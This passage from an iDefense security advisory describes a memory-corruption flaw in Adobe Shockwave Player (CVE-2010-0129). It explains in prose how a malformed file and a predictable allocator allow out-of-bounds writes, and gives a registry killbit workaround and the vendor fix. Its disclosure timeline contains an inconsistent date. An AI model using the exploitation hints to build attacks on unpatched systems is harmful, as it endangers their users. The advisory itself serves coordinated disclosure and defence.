content in the form of Shockwave videos. For more information, see the
vendor's site found at the following link:<BR> <BR>
http://get.adobe.com/shockwave
II. <BR> <BR> The
vulnerability takes place during the processing of a certain malformed
file. A function calculates an offset to be used within a memory mapped
file and returns the offset value. The return value is not checked. This
can lead to a condition where an attacker is able to overwrite memory
outside the bounds of the allocated memory map.
III. To exploit
this vulnerability, a targeted user must load a malicious file created
by an attacker. An attacker typically accomplishes this via social
engineering or injecting content into a compromised, trusted site. <BR>
<BR> Adobe Shockwave Player implements a custom memory management system
for object allocation. Due to the design of the memory allocator, an
attacker is able to predict the distance of objects within a memory
map. This condition can help facilitate reliable exploitation of this
vulnerability.
IV. DETECTION
iDefense has confirmed the existence of this vulnerability in the latest
version of Shockwave Player at the time of testing, version 11.5.6r606.
V. WORKAROUND
The killbit for the Shockwave Player ActiveX control can be set by
creating the following registry key:<BR> <BR>
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX
Compatibility\{233C1507-6A77-46A4-9443-F871F945D258} Under this key
create a new DWORD value called "Compatibility Flags" and set its
hexadecimal value to 400. <BR> <BR> To re-enable Shockwave Player set
the "Compatibility Flags" value to 0.
VI. VENDOR RESPONSE
Adobe has released a fix which addresses this issue. Information about
downloadable vendor updates can be found by clicking on the URLs shown.
http://get.adobe.com/shockwave/
VII. CVE INFORMATION
The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2010-0129 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.
VIII. DISCLOSURE TIMELINE
03/03/2010 Initial Vendor Notification
03/03/2009 Initial Vendor Reply
05/11/2010 Coordinated Public Disclosure
IX. CREDIT
The discoverer of this vulnerability wishes to remain anonymous.
Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php
Free tools, research and upcoming events
http://labs.idefense.com/
X. LEGAL NOTICES
Copyright \xa9 2010 iDefense, Inc.
Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.
Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/